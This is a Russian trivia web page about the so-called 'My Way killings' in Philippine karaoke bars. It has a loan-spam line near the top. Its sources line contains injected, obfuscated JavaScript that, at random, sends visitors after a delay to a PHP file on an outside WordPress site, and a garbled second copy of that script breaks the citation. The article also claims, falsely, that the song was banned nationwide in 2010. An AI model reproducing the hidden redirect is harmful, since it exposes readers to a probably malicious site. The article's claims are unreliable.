Сайт с самыми интересными фактами, вопросами викторин, загадками и человеческими заблуждениями!
займ на карту кредит онлайн рко

My Way killings

338
My way  в Караоке
На Филиппинах караоке безумно популярна, а My Way одна из любимых песен в народе. Еще на Филиппинах легализовано огнестрельное оружие. Поэтому те, кто осмеливаются исполнять эту песню и фальшивят, рискуют вызвать гнев разгоряченной алкоголем толпы. Так, например, в 2007-м году погиб 29-летний Роми Балигула: он допел песню до середины, проигнорировал окрик охранника заведения и продолжил фальшивить; за что и получил пулю в грудь из револьвера.
Скептики утверждали, что это лишь совпадение – просто песня Синатры слишком часто исполняется в филиппинских караоке-барах. Как бы то ни было, только за 2010 год на Филиппинах произошло полдюжины убийств, связанных с My Way. В том же 2010 году песню запретили для исполнения и изъяли из всех караоке-баров. Запрет действует до сих пор.  Слушать можно, а петь — нет.
В филиппинских караоке-барах насилие – не редкость. Там часто происходят драки из-за того, что подвыпившие посетители плохо поют или исполняют занудные песни. Впрочем, ни одна из них не заканчивается убийством исполнителя, в отличие от My Way.

Источники:  $zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to-ban-song.html” target=”_blank” rel=”noopener”>The Telegraph, The New York Times

Комментарии закрыты.